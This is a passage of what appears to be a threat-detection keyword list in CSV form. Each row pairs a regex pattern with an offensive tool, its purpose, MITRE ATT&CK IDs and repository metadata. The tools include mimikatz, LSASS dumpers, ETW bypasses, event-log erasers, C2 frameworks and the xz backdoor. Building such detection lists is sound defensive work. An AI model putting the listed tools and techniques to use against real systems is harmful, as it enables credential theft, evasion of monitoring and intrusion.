Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Enumeration\DesktopAC*",".{0,1000}Enumeration\\DesktopAC.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Env:TMP\ACl.log*",".{0,1000}Env\:TMP\\ACl\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*env_var_spoofing_poc.cpp*",".{0,1000}env_var_spoofing_poc\.cpp.{0,1000}","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*eo.oe.kiwi*",".{0,1000}eo\.oe\.kiwi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*EoP PoC exploiting the AMD driver *",".{0,1000}EoP\sPoC\sexploiting\sthe\sAMD\sdriver\s.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","0","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "*EoP PoC exploiting the Intel driver *",".{0,1000}EoP\sPoC\sexploiting\sthe\sIntel\sdriver\s.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","0","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "*eop_pdfwkrnl.py*",".{0,1000}eop_pdfwkrnl\.py.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "*eop_pdfwkrnl_loop.py*",".{0,1000}eop_pdfwkrnl_loop\.py.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "*eop_rtport.py*",".{0,1000}eop_rtport\.py.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "*eop_stdcdrvws64.py*",".{0,1000}eop_stdcdrvws64\.py.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "*erase_dos_magic_bytes(*",".{0,1000}erase_dos_magic_bytes\(.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*erebe/wstunnel*",".{0,1000}erebe\/wstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*Erebus/*spacerunner*",".{0,1000}Erebus\/.{0,1000}spacerunner.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*ERPScan-tockenchpoken.zip*",".{0,1000}ERPScan\-tockenchpoken\.zip.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","1","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*Error parsing lsass dump with pypykatz*",".{0,1000}Error\sparsing\slsass\sdump\swith\spypykatz.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*eRv6yTYhShell*",".{0,1000}eRv6yTYhShell.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*erwan2212/NTHASH-FPC*",".{0,1000}erwan2212\/NTHASH\-FPC.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*ES.Alan.Core/*",".{0,1000}ES\.Alan\.Core\/.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*escalate/golden_ticket*",".{0,1000}escalate\/golden_ticket.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*escalate/unmarshal_cmd_exec*",".{0,1000}escalate\/unmarshal_cmd_exec.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*EspressoCake/PPLDump_BOF*",".{0,1000}EspressoCake\/PPLDump_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*Eternalblue-*.exe*",".{0,1000}Eternalblue\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*EternalBlue.ps1*",".{0,1000}EternalBlue\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1064","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*eternalblue.rb*",".{0,1000}eternalblue\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Eternalblue-Doublepulsar*",".{0,1000}Eternalblue\-Doublepulsar.{0,1000}","offensive_tool_keyword","Eternalblue-Doublepulsar-Metasploit","doublepulsa vulnerability exploit DoublePulsar is a backdoor implant tool developed by the U.S. National Security Agencys (NSA) Equation Group that was leaked by The Shadow Brokers in early 2017.[3] The tool infected more than 200.000 Microsoft Windows computers in only a few weeks.[4][5][3][6][7] and was used alongside EternalBlue in the May 2017 WannaCry ransomware attack.[8][9][10] A variant of DoublePulsar was first seen in the wild in March 2016. as discovered by Symantec. [11]","T1055 - T1218","TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/Telefonica/Eternalblue-Doublepulsar-Metasploit","1","1","N/A","N/A","10","1071","524","2021-03-31T09:44:10Z","2017-04-24T12:41:56Z" "*EternalHushFramework-*-SNAPSHOT.jar*",".{0,1000}EternalHushFramework\-.{0,1000}\-SNAPSHOT\.jar.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*EternalHushFramework-main*",".{0,1000}EternalHushFramework\-main.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*EternalHushMain.java*",".{0,1000}EternalHushMain\.java.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*EternalHushWindow.java*",".{0,1000}EternalHushWindow\.java.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*ethereum2john.py*",".{0,1000}ethereum2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*etw-bypass*",".{0,1000}etw\-bypass.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ETWEventSubscription*Program.cs*",".{0,1000}ETWEventSubscription.{0,1000}Program\.cs.{0,1000}","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*ETWEventSubscription.exe* -ProcStart *",".{0,1000}ETWEventSubscription\.exe.{0,1000}\s\-ProcStart\s.{0,1000}","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*ETWEventSubscription.exe* -UserLogon*",".{0,1000}ETWEventSubscription\.exe.{0,1000}\s\-UserLogon.{0,1000}","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*etw-fuck.exe *",".{0,1000}etw\-fuck\.exe\s.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*EtwHash.exe*",".{0,1000}EtwHash\.exe.{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","244","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" "*EtwHash.git*",".{0,1000}EtwHash\.git.{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","244","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" "*ETWHash.sln*",".{0,1000}ETWHash\.sln.{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","244","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" "*etwti-hook.*",".{0,1000}etwti\-hook\..{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*eval $zrKcKQ*",".{0,1000}eval\s\$zrKcKQ.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","10","10","N/A","N/A","N/A","N/A" "*evallen/ntpescape*",".{0,1000}evallen\/ntpescape.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/evallen/ntpescape","1","1","N/A","10","2","130","16","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z" "*evasion/has_recycle_bin.*",".{0,1000}evasion\/has_recycle_bin\..{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*evasion_shellcode.js*",".{0,1000}evasion_shellcode\.js.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*event::clear*",".{0,1000}event\:\:clear.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*event::drop*",".{0,1000}event\:\:drop.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*EventAggregation.dll.bak*",".{0,1000}EventAggregation\.dll\.bak.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","128","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" "*EventAggregation.dll.bak*",".{0,1000}EventAggregation\.dll\.bak.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*EventAggregation.dll.patched*",".{0,1000}EventAggregation\.dll\.patched.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*EventAggregationPH.dll*",".{0,1000}EventAggregationPH\.dll.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*eventcleaner closehandle*",".{0,1000}eventcleaner\sclosehandle.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*eventcleaner suspend*",".{0,1000}eventcleaner\ssuspend.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*EventCleaner.exe 